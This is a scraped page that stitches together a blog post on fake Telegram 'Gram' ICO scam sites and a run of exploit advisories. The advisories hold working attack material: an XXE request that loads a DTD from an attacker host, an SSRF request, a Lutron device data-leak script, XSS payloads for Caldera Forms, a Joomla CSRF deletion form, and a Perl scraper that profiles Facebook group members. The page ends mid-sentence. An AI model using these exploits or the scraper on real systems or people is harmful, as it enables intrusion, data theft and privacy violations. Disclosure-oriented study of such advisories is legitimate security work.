Tens of thousands per Gram

Looking at Instagram one morning, I spotted several posts from some fairly well-known people (in certain circles) who had invested in an ICO held by Telegram. Interesting, I thought to myself. I fancy a piece of that. Only I was pretty sure that if Telegram was indeed holding an ICO, it would be a private affair — off limits to cash-strapped social media-based “investors.” That’s when I decided to do some digging.

Let’s start with a brief history lesson. In late 2017, information appeared on specialized resources about a Telegram ICO to finance the launch of its own blockchain platform based on TON (Telegram Open Network) technology. Despite the fact that Pavel Durov did not confirm the ICO rumors, and no information was posted on the company’s official website (and still hasn’t been), the mooted project attracted a huge number of potential investors. According to various (dubious) sources, participation in the ICO is by invitation only, and the first closed round, the so-called presale, has already taken place. Technical documentation and a white paper also appeared online, but their authenticity is not confirmed.

Perhaps the masterminds behind the project deliberately clothed it in mystery to spark interest. In any case, the lack of information bred speculation and provided fertile ground for scammers: the rumors prompted mailshots seemingly from official representatives of the platform, inviting people to take part in the ICO and purchase tokens. And there was a mushrooming of sites supposedly selling Grams (the name of the cryptocurrency that Telegram presumably intends to launch).

When creating fake sites, cybercriminals try to keep to the style of technical documentation and white papers

Meanwhile, Pavel Durov tweeted that all TON-related news would be posted only on the official website, and asked for any “Gram” sales to be reported:

Despite the announcement, fake sites continued scooping cash from unwitting victims. But to give credit where it’s due, their creators did a superb job. Unlike some phishing fakes, these sites really do lure people in. Not only that, most use a secure connection, require registration, and generate a unique online wallet for each new victim, making it hard to track the movement of money.

Grams can be purchased in a selection of cryptocurrencies

The price of the new cryptocurrency varies greatly from one fake site to the next. And although most of them create unique wallets for victims, I managed to find several that use static wallets. From the transaction history of one of them, we see that the cybercriminals withdrew 85 ETH:

Withdrawal of funds harvested in Ethereum

At the time of writing this article, the Ethereum exchange rate was about $422. This resource alone seems to have collected more than 35 000$(2 million rubles), and there are dozens like it. Judging by their content, it’s possible they have common ownership. For example, several have one and the same Our Team section.

Suspiciously similar Our Team sections

While the presence of the Durov brothers doesn’t raise any question marks, Lucas Pernas-Valles seems to exist only on dozens of other fake sites. He may indeed be a member of Telegram’s new project team, but a brief online check reveals that the person in the photo is not called Lucas Pernas-Valles, although he does have cryptocurrency links.

It should be noted that this ICO project is one of relatively few to have attracted mass attention. And where there’s mass attention, there’s fraud. The lack of reliable information from official sources only serves to aggravate the situation

Digital Guardian Management Console 7.1.2.0015 XXE Injection

Title: Digital Guardian Managment Console – XML External Entity Vulnerability
Author: Pawel Gocyla
Date: 18 April 2018
CVE: CVE-2018-10175

Affected software:
==================
Digital Guardian Managment Console Version 7.1.2.0015

Description:
============
Digital Guardian is an American data loss prevention software company which provides software both at the end-user level and in corporate networks, servers, databases, and the cloud. Digital Guardian is designed to see and stop malicious actions by users and malware on endpoints. It puts data events into context and applies a granular set of rules to protect it against threats.

The company holds 20 patents for its technology.Its customers include about 300 Global 2000 companies, as well as seven of the 10 largest brands in the world. It is considered to be a leader in the global data loss prevention market.

Vulnerability:
**************
XML External Entity injection vulnerability has been found in the application. XEE is an XML parser feature, which should always be turned off unless required for some good reason. Exploitation of this vulnerability can allow to:
-conduct external network requests from the server to external locations (Server Side Request Forgery), which might be useful for other attacks against locations which trust this server
-list directory contents on the server with permissions of the application user
-read files on the server with permissions of the application user

In this case pentester was able to read system files and capture NTLM hash of system user.

XML External Entity:
====================
Vulnerable parameter: “importFile”

Request:

POST /DigitalGuardian/PopUps/ImportUtility.aspx?importType=202&dgmessageid=trendBuilder&d=eM0JqTWiDRys%2fdIo3sK%2bBWsSIfWqZD0sZtrjRgTxWcI%3d HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://[host]/DigitalGuardian/PopUps/ImportUtility.aspx?importType=202&dgmessageid=trendBuilder&d=eM0JqTWiDRys%2fdIo3sK%2bBWsSIfWqZD0sZtrjRgTxWcI%3d
Accept-Language: en-GB
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: multipart/form-data; boundary=—————————7e0303204c1086
Accept-Encoding: gzip, deflate
Host: [host]
Content-Length: 1166
Pragma: no-cache
Cookie: MRUDomain=00000000-0000-0000-0000-000000000002; ASP.NET_SessionId=bo3msxmnwidpo2xnpvga1dcd; DGAuthToken=23871fb9-35ef-425f-91ca-9f567dee78bd; .DGMCASPXAUTH=1B15A3216B7BF6A9C7920F36EF747366F8955CAECD92145DBA0E8C88A3BF5299A4171B1765CBF6DC9F656A5AC28F24BE736C5A3D036814159A8832D20A8268155F82D384BFB4EADCC2E06BEDE280833F2A33B62331B2480D95A14A6182426E36DB1126CE38CE8A6B5E74EFFBB25CE01CFC9495AE65C8F281B78E0CB61F374D0C3C088105C353DEBD447333C5F661E83A5DA01AF66CEE040C51B0DE97B7D7164C9CE4CA1A4DCC3FAB4E1A322CCFF1675B3E83593BDE883CAF89D0DBDA6B7AC3D416ACEEFF99758F8D4B2099797787A0EC604C6B71AB78CF90F91C37DDC8EE3EEF9B4460B8CEE520BA347871D61BF7CB45C31FE3CF322890782928976DD95FCDED7AC05A97AF546619DAF70526E40A2D996854E4A0C22D52BEDB0100C98D2635839A8809CA81706FF0ED737BACD0BFD7B8648940FF02E5273D1CF76CBF077B6D864D9CF623FE06C9A3C618250B056533866054D4D59E3B787C386C280F5BA32483F82BA19BF758980764EFAE124E51F0E7EDA22CDA1D0DF0616219E1035820870C7C7C9D52DEE7E6135D1BD27D0D91B4195A1106C22EBE15FFEF1E1DCF0C14BC4F1531417E4B50F188EC3F0619962797E6082658AD64E42C1CDE46415E07628A61C2201DC79ED65A7C46A49A9DB09A43CF34985F5EFBCFF1F9BAB8EB6B568710E51B6FDC9DB2CA9F4E11CD29B6F63DFC41C1A576E610A328428149748A5C93993E
Connection: close

—————————–7e0303204c1086
Content-Disposition: form-data; name=”__EVENTTARGET”

lbPostBack
—————————–7e0303204c1086
Content-Disposition: form-data; name=”__EVENTARGUMENT”

—————————–7e0303204c1086
Content-Disposition: form-data; name=”__VIEWSTATE”

/wEPDwUJMTk4MzgwNzM3D2QWAgIDDxYCHgxhdXRvY29tcGxldGUFA29mZhYEAgEPDxYCHgRUZXh0BQtJbXBvcnQgRmlsZWRkAg8PD2QWAh4Hb25jbGljawW6AXRoaXMuZGlzYWJsZWQ9dHJ1ZTt3aW5kb3cuZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2J0bkNhbmNlbCcpLmRpc2FibGVkPXRydWU7d2luZG93LmRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdwcm9jZXNzQmFyJykucnVudGltZVN0eWxlLnZpc2liaWxpdHk9J3Zpc2libGUnO19fZG9Qb3N0QmFjaygnbGJQb3N0QmFjaycsJycpO2Rknd5tpF/MQlLhdH52OotwU+mrL50J+rMq1BBZQrKSvZc=
—————————–7e0303204c1086
Content-Disposition: form-data; name=”__VIEWSTATEGENERATOR”

56416A97
—————————–7e0303204c1086
Content-Disposition: form-data; name=”importFile”; filename=”xxe.xml”
Content-Type: text/xml

<?xml version=”1.0″ encoding=”UTF-8″?>
<!DOCTYPE foo SYSTEM “http://[Attacker_IP]:8888/evil.dtd”>
<foo>&e1;</foo>

—————————–7e0303204c1086–

Contact:
========
pawellgocyla[at]gmail[dot]com

Digital Guardian Management Console 7.1.2.0015 Server Side Request Forgery

Title: Digital Guardian Managment Console – Server Side Request Forgery Vulnerability
Author: Pawel Gocyla
Date: 18 April 2018
CVE: CVE-2018-10174

Affected software:
==================
Digital Guardian Managment Console Version 7.1.2.0015

Description:
============
Digital Guardian is an American data loss prevention software company which provides software both at the end-user level and in corporate networks, servers, databases, and the cloud. Digital Guardian is designed to see and stop malicious actions by users and malware on endpoints. It puts data events into context and applies a granular set of rules to protect it against threats.

The company holds 20 patents for its technology.Its customers include about 300 Global 2000 companies, as well as seven of the 10 largest brands in the world. It is considered to be a leader in the global data loss prevention market.

Vulnerability:
**************
By providing URLs to unexpected hosts or ports, attackers can make it appears that the server is sending the request, possibly bypassing access controls such as firewalls that prevent the attackers from accessing the URLs directly. The server can be used as a proxy to conduct port scanning of hosts in internal networks, use other URLs such as that can access documents on the system (using file://).

In this case pentester was able to capture NTLM hash of system user.
It must be noted, that this vulnerability occurs even if logged user has read-only role.

Server Side Request Forgery:
============================
Vulnerable parameter: “UrlTextBox”

Request:
————————
POST /DigitalGuardian/Policies/FeedList.aspx?config=3&listId=fc8e48c0-4ff7-4878-88b6-b4863f68f08e&typeUrl HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://[host]/DigitalGuardian/Policies/FeedList.aspx?config=3&listId=fc8e48c0-4ff7-4878-88b6-b4863f68f08e&typeUrl
Accept-Language: en-GB
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: [host]
Content-Length: 13935
Pragma: no-cache
Cookie: MRUDomain=00000000-0000-0000-0000-000000000002; ASP.NET_SessionId=bydj2xwynaphlo0dzhm3sard; DGAuthToken=fc471add-2f92-4ed2-9091-20666e1829d2; .DGMCASPXAUTH=4661D6A6E48BAB81334FA1ED73B0E4E18EB87927985439E456F6A0A2E4B0B31A83A0968AC1612E516494080AB1B70C9008EAD36EF4176825FA79E3EF47025CEED0CBDDCD5C02BE7DC2E15B2EF4952372892C889F0B18699D37C84F4EEB151859FEA6006EF0F719B97B2D494AF99CEC89465A3ECBD4406F9B79153B8D82C67814C054F0B87AA6CC06075C77F0F88F90FD55C92630357CFBE381A2937ADFB8ABB5232C561859BEFF4E6CDAF981544AAF24145830D4CFD739BC89B3BE55E32AB981081F57B8DBE8A9B7E9BEE83DF2A1C39A9F894BA7F636935C6CD107BBE724371A7E28F8964202EC050FFEB9847C05B9AC2EB932C81B75B31866CBED69F669BBC3814E0662FD148DF727E841A7CEEA0A7CC250D50F3142D9C7278B2AB42CC0CF84608EF750A2BFC905AE36E2569AC8BB5CA3E0FEF9FFF80A665E23102EB0F8CC1F45F83AC2074FA82A6E4197E714B03034ED1078973B9A8A00CC51FF144450069736798B6BA806681CDF4D8B7E899F180AF2BE724D3E3122C9C6F676E18338B98A422C047555A1BA2AFA06EF208B16A2F9AF9A9E778001960B50DB0DD04FC96D824986B4BD80CAEBB496770B1D39559A421483CB4D2A15954D97E3C7ADE68363811DFF2BB7B22F2F849EBA1AD45AFBE661F509824E9A79982F63791EB6FEB2B2014ED7B372119D8E0B2BD10D0B734410527372D927E6AF762B6F336CA61A8265F8
Connection: close

__EVENTTARGET=TestButton1&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=[valid viewstate&__VIEWSTATEGENERATOR=5C3F6F0E&__SAVESCROLL=0&ContentTypeHidden=0&ContentTypeValueHidden=0&NameTextbox=atp-net-dnsbh-malwaredomainblocklist.DNSnames&StatusList=1&UrlTextBox=file%3a%2f%2f%2f%2f[Attacker_IP:port/asd/asd]&ddlFormatDropDownList=0&MaxSizeNumericSpinner%3ASpinTextBox=1000&TimeoutNumericSpinner%3ASpinTextBox=15&PolicyContainerList=00000000-0000-0000-0000-000000000001&DescriptionTextbox=ATP+Threat+feed+from+generated+from+http%3A%2F%2Fwww.malwaredomainlist.com%2Fhostslist%2Fhosts.txt&ddlFeedCategory=1&Schedule%3ATypeList=3&Schedule%3ATimeTextbox%3ATIME_TEXT_BOX=00%3A00&CheckBoxDelimiter=on&DelimiterTextBox=space
———————

Contact:
========
pawellgocyla[at]gmail[dot]com

Lutron Quantum 3.2.243 Information Disclosure

# Exploit Title: Login bypass and data leak – Lutron Quantum 2.0 – 3.2.243 firmware
# Date: 20-03-2018
# Exploit Author: David Castro
# Contact: https://twitter.com/SadFud75
# Vendor Homepage: http://www.lutron.com
# Software Link: http://www.lutron.com/en-US/Products/Pages/WholeBuildingSystems/Quantum/Overview.aspx
# Version: Lutron Quantum 2.0 – 3.2.243 firmware
# CVE : CVE-2018-8880
# Shodan dork: html:”<h1>LUTRON</h1>”

Python 2.7 Output:

Leaking data from HOST
[+] Device info:

MAC: 000FE702A999
PRODUCT FAMILY: Gulliver
PRODUCT TYPE: Processor
SERIAL NUMBER: 007B24B4
GUID: 0DFB959BD0D8784DA9501B958F099779
CODE VERSION: 7.5.0

[+] Network info:

INTERNAL IP: 192.168.0.2
SUBNET MASK: 255.255.255.0
GATEWAY: 192.168.0.1
TELNET PORT: 23
FTP PORT: 21
REMOTE PORT: 51023

[+] Done.

”’

import requests
from bs4 import BeautifulSoup

ip = raw_input(“Enter target ip: “)
port = raw_input(“Enter target port: “)

print ‘Leaking data from ‘ + ‘http://’ + ip + “:” + port
r = requests.get(‘http://’ + ip + “:” + port + ‘/deviceIP’)
resultado = r.text
parseado = BeautifulSoup(resultado, “lxml”)

print ‘[+] Device info:’
print ”
print ‘MAC: ‘ + parseado.find(‘input’, {‘name’: ‘MacAddr’}).get(‘value’)
print ‘PRODUCT FAMILY: ‘ + parseado.find(‘input’, {‘name’: ‘PRODFAM’}).get(‘value’)
print ‘PRODUCT TYPE: ‘ + parseado.find(‘input’, {‘name’: ‘PRODTYPE’}).get(‘value’)
print ‘SERIAL NUMBER: ‘ + parseado.find(‘input’, {‘name’: ‘SERNUM’}).get(‘value’)
print ‘GUID: ‘ + parseado.find(‘input’, {‘name’: ‘GUID’}).get(‘value’)
print ‘CODE VERSION: ‘ + parseado.find(‘input’, {‘name’: ‘CODEVER’}).get(‘value’)
print ”
print ‘[+] Network info:’
print ”
print ‘INTERNAL IP: ‘ + parseado.find(‘input’, {‘name’: ‘IPADDR’}).get(‘value’)
print ‘SUBNET MASK: ‘ + parseado.find(‘input’, {‘name’: ‘SUBNETMK’}).get(‘value’)
print ‘GATEWAY: ‘ + parseado.find(‘input’, {‘name’: ‘GATEADDR’}).get(‘value’)
print ‘TELNET PORT: ‘ + parseado.find(‘input’, {‘name’: ‘TELPORT’}).get(‘value’)
print ‘FTP PORT: ‘ + parseado.find(‘input’, {‘name’: ‘FTPPORT’}).get(‘value’)
print ‘REMOTE PORT: ‘ + parseado.find(‘input’, {‘name’: ‘REMOTEPORT’}).get(‘value’)
print ”
print ‘[+] Done.’
print ”

WordPress Caldera Forms 1.5.9.1 Cross Site Scripting

# Exploit Title: CalderaForms 1.5.9.1 – multiple XSS
# Date: 02-03-2018
# Exploit Author: Federico Scalco
# fscalco at mentat dot is
# @mindpr00f
# Vendor Homepage: https://calderaforms.com/
# Software Link: https://wordpress.org/plugins/caldera-forms/
# Vulnerable App: https://github.com/CalderaWP/Caldera-Forms/archive/1.5.9.1.zip
# Version: 1.5.9.1 (older versions may also be affected)
# Tested on: WordPress 4.9.4
# CVE : i>>?CVE-2018-7747

1) SOFTWARE DESCRIPTION
“i>>?Caldera Form is a free and powerful WordPress plugin that creates
responsive forms with a simple drag and drop editor.”
It is reported to have i>>?100,000+ active installations at the moment of this
writing.

2) VULNERABILITY OVERVIEW
The application fails to validate user-supplied input, hence it stores the
unsanitized buffer in the database.
The vulnerabilities reported here will be exploitable ONLY if certain
conditions are met, which is not the case in a CF’s default configuration
(although still being vulnerable).

A note on buffers containing strings:
single (‘) and double (“) quotes are correctly escaped, backticks (`)
are not.

3) DETAILS

3.a) Stored XSS – public
When submitting a CF form, the plugin will show a greeting message to
notify the user that everything went ok.
This message is editable by the site’s admin and can contain part of the
user-supplied data (e.g. they’re first name). In this case, simply inject
HTML code into the parameter which gets returned in the greeting message
and submit the POST request. A JSON response will follow, containing, among
other data:
– the greeting message (“html”, which contains the malicious payload that
gets executed right away)
– form’s ID (“form_id”)
– data’s ID (“cf_id”)

{
“data”:{“cf_id”:”<DATA_ID>”},
“html”:”<GREETING MESSAGE>”,
“type”:”…”,
“form_id”:”<FORM_ID>”,
“form_name”:”…”,
“status”:”…”
}

At this point, to reach the stored XSS, simply build a GET request using
the obtained data.
The malicious payload will be found at

http(s)://<target>/cf-api/<FORM_ID>/?cf_su=1&cf_id=<DATA_ID>

Vulnerable config:
– form > form settings > capture entries > checked (ON by default)
– form > form settings > success message > add some of the user
supplied fields (absent by default)

To replicate this on a fresh install:
– Create a new, default, contact form
– Go to “Form Settings” tab and edit the success message to include,
for example, the user’s first name.
e.g.: Form has been successfully submitted. Thank you %first_name%.
– Save & publish
– As an unauthenticated user, submit the contact form injecting HTML
code in first name’s parameter. XSS will be triggered right away
– To recall the payload as a stored XSS, read the POST’s response and
point your browser to
<target>/cf-api/<FORM_ID>/?cf_su=1&cf_id=<DATA_ID>

3.b) Stored XSS – admin interface
CalderaForms gives the ability to notify the admin via email everytime a
form gets submitted.
Furthermore, an admin can choose to enable an “email transacion log” for
debugging purposes (disabled by default).
If this configuration is in place, a copy of the malicious payload
described above will be shown in the administration panel, when visiting
that form’s malicious entry’s details.

Vulnerable config:
– form > form settings > capture entries > checked (ON by default)
– form > email > debug mailer > checked (OFF by default)

To replicate this on a fresh install:
– Enable the transaction log (form -> edit -> email tab -> check
“Enable email send transaction log”)
– Replicate the injection described at 3.a (all fields can be used this
time) as an unauthenticated user
– Back again in the admin interface, visit form’s entries, identify the
malicious one and click on the “view” button

This will pop a details window and trigger the XSS.

3.c) Importing a weaponized form – admin interface
CalderaForms gives the ability to import a form (JSON format).
A malicious form field can be crafted which will trigger an XSS when said
field gets displayed/edited after the import.

It’s worth noting that this flaw does not depend on custom configurations,
although it’s not “remotely” and “automatically” exploitable. The problem
here arise, for example, when an admin imports a malicious JSON.

To replicate this on a fresh install:
– Create a form and export it (JSON format)
– Edit the json and inject HTML code. “label” and “slug” parameters
were tested, others may be vulnerable too.
e.g.:
{

“label”:”First<script>alert(1);</script> Name”,
“slug”:”first_name\”/><script>alert(2);</script>”

}

– Import the malicious form to trigger the XSS in the administration
interface

4) REMEDIATION
Update to the latest version available.

If any personalized configuration is found exploitable, the following steps
can be followed, as a temporary mitigation strategy, if no update is
available or updating is not an option, for whatever reason:
– for every form, under “Form Settings”, prune every variable that gets
returned to the user as a success message
– for every form, under the “Email” tab, un-check “Enable email send
transaction log”
– for every form that gets imported perform a thorough review

5) TIMELINE & FINAL NOTES

02-03-18 > vendor gets notified
06-03-18 > vendor replies
07-03-18 > CVE requested and assigned
27-03-18 > patch released
27-03-18 > vulnerability disclosed

Special thanks go to Josh Pollock and his team, from Caldera, who invested
passion and energy in understanding and patching these issues.

Facebook Graph Groups Crosswalk User Metadata Mapping Weakness

#!/usr/bin/perl
#
# Facebook (facebug) 'Graph' Groups crosswalk user's
# metadata mapping weakness (Demo PoC)
#
#
# 2018 Todor Donev <todor.donev at gmail.com>
# https://ethical-hacker.org/
# https://facebook.com/ethicalhackerorg
#
# Description:
# Criminal hacker (CRACKER) can take advantage of
# this weakness by creating a specialized database
# to manipulate the humans (facebook users) with
# fake news, misinformation, propaganda or influence
# elections.
#
# See Also:
# https://en.wikipedia.org/wiki/Schema_crosswalk
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# Requirements:
# cpan install HTTP::Cookies
# cpan install WWW::Mechanize
#
#
# I know that is buggy but is only conceptual tool
# which demonstrate exploitation of this weakness.
#
#
# Facebook answer:
# Hi Todor,
#
# Thank you for contacting us. Unfortunately what
# you have described is not currently covered by
# this program. Please see
# https://www.facebook.com/data-abuse/terms/ for
# more information about what is currently in scope
# of this program. We will follow up with you
# regarding any questions we may have. For any other
# questions or concerns, please visit our Help Center:
# https://www.facebook.com/help.
#
# Thanks,
#
# Amber Serrano
# Developer Operations
#
# Data Abuse Bounty is useless when this door is widely
# opened for criminal abusing.
#
# Now this weakness is patched..
#
# Buggy, Buggy, Buggy.. 🙂
#
use strict;
use WWW::Mechanize;
use HTTP::Cookies;
use open ':std', ':encoding(UTF-8)';

my $un = ''; # facebook login
my $pw = ''; # facebook password
print "Facebook (facebug) \'Graph\' Groups crosswalk metadata mapping weakness (Demo PoC)\n";
print "[ Website: https://ethical-hacker.org\n";
print "[ Author: Todor Donev <todor.donev at gmail.com>\n";
die "Usage: perl $0 <Group ID>\n" unless (scalar @ARGV)==1;
my $mech = WWW::Mechanize->new();$mech->cookie_jar(HTTP::Cookies->new());
$mech->agent_alias('Linux Mozilla');
$mech->get("http://m.facebook.com/login.php");
$mech->submit_form(form_number => 1,fields =>{email=>$un,pass=>$pw});
die "Error: $! \n" if !$mech->content() =~ /post_form_id\"\svalue=\"(\w+)\"/;
foreach my $gid (@ARGV){
$mech->get("https://m.facebook.com/browse/group/members/?id=$gid");
printf "$1 " if ($mech->content() =~ m/<title>(.*)<\/title>/g);
for (my $j = 0; $j <= 100000; $j += 30){
$mech->get("https://m.facebook.com/browse/group/members/?id=$gid&start=$j&listType=list_general");
die "[ No results found\n[\n[ ==========================\n" if (($mech->content() =~ m{Content Not Found}) or ($mech->content() =~ m{No results found.}));
if (my @profiles = ($mech->content() =~ m/<div><h3><a href="\/(.*?)">(.*?)<\/a><\/h3>/g)){
if (my @userid = ($mech->content() =~ m/id="member_(.*?)">/g)){
while (@profiles || @userid) {
my $fburl = shift @profiles;
my $name = shift @profiles;
my $pid = shift @userid;
printf "\x1b\x5b0;32m[\x1b\x5b0m User ID: \x1b\x5b0;35m $pid \x1b\x5b0m Name/Profile: \x1b\x5b1;36m $name \x1b\x5b0m \x1b\x5b1;31m=>\x1b\x5b0m https://www.facebook.com/\x1b\x5b0;36m$fburl \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Which facebook groups the person joined:\x1b\x5b0;33m https://www.facebook.com/search/$pid/groups \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Which private facebook groups the person joined:\x1b\x5b0;33m https://www.facebook.com/search/$pid/groups-privacy \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Where the person is bornd:\x1b\x5b0;33m https://www.facebook.com/search/$pid/users-birth-place \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Posts that the person commented on:\x1b\x5b0;33m https://www.facebook.com/search/$pid/stories-commented \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Posts that the person like:\x1b\x5b0;33m https://www.facebook.com/search/$pid/stories-liked \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m In which posts is this person tagged:\x1b\x5b0;33m https://www.facebook.com/search/$pid/stories-tagged \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Posts by the person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/stories-by \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Photos maded by the person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-by \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Posts that the person like:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-in \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Which photos does this person like:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-liked \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Photos made of this person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-of \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m In which photos is this person tagged:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-tagged \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m What photos did the person comment on:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-commented \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m What photos did the friends upload:\x1b\x5b0;33m https://www.facebook.com/search/$pid/friends/photos-uploaded \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m What photos did the friends tagged:\x1b\x5b0;33m https://www.facebook.com/search/$pid/friends/photos-tagged \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m What photos maded by the person's friends:\x1b\x5b0;33m https://www.facebook.com/search/$pid/friends/photos-of \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Photos by the person's friends:\x1b\x5b0;33m https://www.facebook.com/search/$pid/friends/photos-by \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Videos made of this person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-of \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Videos maded by the person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-by \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m In which videos is this person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-in \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Which videos does this person like:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-liked \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m In which videos is this person tagged:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-tagged \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m What videos did the person comment on:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-commented \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m What videos did the friends upload:\x1b\x5b0;33m https://www.facebook.com/search/$pid/friends/videos-uploaded \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m All visited places:\x1b\x5b0;33m https://www.facebook.com/search/$pid/places-visited \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m Which people are following:\x1b\x5b0;33m https://m.facebook.com/subscribe/lists/?id=$pid \x1b\x5b0m\n";
printf "\x1b\x5b0;32m[\x1b\x5b0m \n";
}
}
}
}
}

Joomla JS Jobs 1.2.0 Cross Site Request Forgery

#######################################
# Exploit Title: Joomla! Component Js Jobs – Multiple Cross Site Request Forgery Vulnerabilities
# Google Dork: N/A
# Date: 17-04-2018
#######################################
# Exploit Author: Sureshbabu Narvaneni#
#######################################
# Author Blog : http://nullnews.in
# Vendor Homepage: https://www.joomsky.com
# Software Link: https://extensions.joomla.org/extension/js-jobs/
# Affected Version: 1.2.0
# Category: WebApps
# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
# CVE : NA
#######################################

1. Vendor Description:

JS Jobs for any business, industry body or staffing company wishing to
establish a presence on the internet. JS Jobs allows you to run your own,
unique jobs classifieds service where you or employer can advertise their
jobs and job seekers can upload their Resumes.

2. Technical Description:

The state changing actions in JS Jobs before 1.2.1 not having any random
token validation which results in Cross Site Request Forgery Vulnerability.

3. Proof of Concept:

Delete Job Entry [Super Admin Access]

<html>
<body>
<script>history.pushState(”, ”, ‘/’)</script>
<form action=”http://[URL]/joomla/administrator/index.php”
method=”POST”>
<input type=”hidden” name=”js_sortby” value=”0″ />
<input type=”hidden” name=”companyname” value=”” />
<input type=”hidden” name=”jobtitle” value=”” />
<input type=”hidden” name=”location” value=”” />
<input type=”hidden” name=”jobcategory” value=”” />
<input type=”hidden” name=”jobtype” value=”” />
<input type=”hidden” name=”datefrom” value=”” />
<input type=”hidden” name=”dateto” value=”” />
<input type=”hidden” name=”status” value=”” />
<input type=”hidden” name=”cid[]” value=”[Job ID]” />
<input type=”hidden” name=”limit” value=”20″ />
<input type=”hidden” name=”limitstart” value=”0″ />
<input type=”hidden” name=”option” value=”com_jsjobs” />
<input type=”hidden” name=”task” value=”job.jobenforcedelete” />
<input type=”hidden” name=”c” value=”job” />
<input type=”hidden” name=”view” value=”job” />
<input type=”hidden” name=”layout” value=”jobs” />
<input type=”hidden” name=”callfrom” value=”jobs” />
<input type=”hidden” name=”boxchecked” value=”1″ />
<input type=”hidden” name=”sortby” value=”asc” />
<input type=”hidden” name=”my_click” value=”” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>

4. Solution:

Update to latest version

https://extensions.joomla.org/extension/js-jobs/

Geist WatchDog Console 3.2.2 XSS / XML Injection / Insecure Permissions

# Exploit Author: bzyo
# CVE: CVE-2018-10077, CVE-2018-10078, CVE-2018-10079
# Twitter: @bzyo_
# Exploit Title: Geist WatchDog Console 3.2.2 – Multiple Vulnerabilities
# Date: 04-17-18
# Vulnerable Software: WatchDog Console – 3.2.2
# Vendor Homepage: http://www.itwatchdogs.com/
# Version: 3.2.2
# Software Link: http://www.itwatchdogs.com/userfiles/file/firmware/Console/WatchDogConsoleInstaller_v3.2.2.exe
# Tested On: Windows 7 x86

Description
—————————————————————–
WatchDog Console suffers from multiple vulnerabilities:

# CVE-2018-10077 Authenticated XML External Entity (XXE)
# CVE-2018-10078 Authenticated Stored Cross Site Scripting (XSS)
# CVE-2018-10079 Insecure File Permissions

Prerequisites
—————————————————————–
To successfully exploit these vulnerabilities, an attacker must already have access
to a system running WatchDog Console using a low-privileged user account

Proof of Concepts
—————————————————————–
### CVE-2018-10079 Insecure File Permissions ###
By default, WatchDog Console 3.2.2 installs all configuration data at ‘C:\ProgramData\WatchDog Console’ and
gives ‘Authenticated Users’ group Modify permissions

C:\>icacls “c:\ProgramData\WatchDog Console”
c:\ProgramData\WatchDog Console NT AUTHORITY\Authenticated Users:(OI)(CI)(M,DC)

This allows any local user of the system the ability to reset the application admin password by generating
a password using the PHP md5() function and updating the config.xml file. It also provides the ability to
add data to servers.xml for both CVE-2018-10078 and CVE-2018-10079 or through the application interface

### CVE-2018-10077 Authenticated XML External Entity (XXE) ###
With authenticated admin access to the application or local access to the system, a user has the ability to read
